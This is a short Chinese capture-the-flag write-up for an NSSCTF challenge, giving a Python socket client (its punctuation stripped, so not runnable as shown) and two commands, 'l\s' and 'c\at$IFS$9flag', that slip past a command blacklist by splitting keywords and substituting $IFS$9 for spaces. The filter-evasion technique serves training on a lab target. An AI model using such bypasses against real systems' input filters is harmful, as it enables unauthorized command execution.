CTF黑名单命令过滤绕过 Windows 稳定连接靶机完整WP

一、题目基础信息靶机地址 node7.anna.nssctf.cn端口 21067考点命令黑名单过滤、Linux字符绕过、Python Socket远程连接二、Windows专用连接脚本直接复制使用新建 connect.py 粘贴全部代码保存import socketHOST node7.anna.nssctf.cnPORT 21067sock socket.socket()sock.connect((HOST, PORT))data sock.recv(4096)print(data.decode(utf-8, errorsignore))while True:cmd input( ) \nsock.send(cmd.encode())res sock.recv(2048)print(res.decode(utf-8, errorsignore))if cmd.strip() exit:sock.close()break三、连接靶机标准操作1. 打开Anaconda Promptcd切换到脚本存放目录2. 执行命令运行脚本python connect.py3. 输出靶机图案、出现 输入提示符即连接成功四、绕过黑名单读取flag仅输入以下两条指令1. 查看当前目录文件l\s2. 读取flag文件c\at$IFS$9flag绕过原理1. l\s 、 c\at 拆分关键词避开靶机 ls 、 cat 完整字符黑名单2. $IFS$9 为Linux内置分隔符等效空格规避空格字符过滤。五、收尾操作拿到flag后输入 exit 关闭连接将 NSSCTF{xxx} 格式字符串提交平台。